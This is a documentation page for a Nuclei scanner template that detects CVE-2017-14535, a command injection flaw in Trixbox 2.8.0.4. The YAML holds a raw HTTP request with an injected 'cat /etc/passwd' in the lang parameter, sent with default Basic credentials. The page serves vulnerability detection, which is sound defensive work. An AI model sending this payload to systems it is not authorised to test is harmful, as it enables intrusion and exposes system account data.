Trixbox - 2.8.0.4 OS Command Injection
ID: CVE-2017-14535
Severity: high
Author: pikpikcu
Tags: cve,cve2017,trixbox,rce,injection,edb,netfortris
Description
Section titled “Description”Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.
YAML Source
Section titled “YAML Source”id: CVE-2017-14535
info: name: Trixbox - 2.8.0.4 OS Command Injection author: pikpikcu severity: high description: Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php. impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Upgrade to a patched version of Trixbox or apply the necessary security patches provided by the vendor. reference: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 - https://nvd.nist.gov/vuln/detail/CVE-2017-14535 - https://www.linkedin.com/pulse/trixbox-os-command-injection-vulnerability-sachin-wagh-ceh-ecsa-/?published=t - https://twitter.com/tiger_tigerboy/status/962689803270500352 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 epss-percentile: 0.92413 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: netfortris product: trixbox tags: cve,cve2017,trixbox,rce,injection,edb,netfortris
http: - raw: - | GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: close Cache-Control: max-age=0
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100c35dfe1f73f8c5423a91f9921c45f966bf553943d117a8c1b499b183eca507c802206244606e80a5a60decf30696c169d61784d99edc0c888c0d4e661e6aa02a442a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-14535.yaml"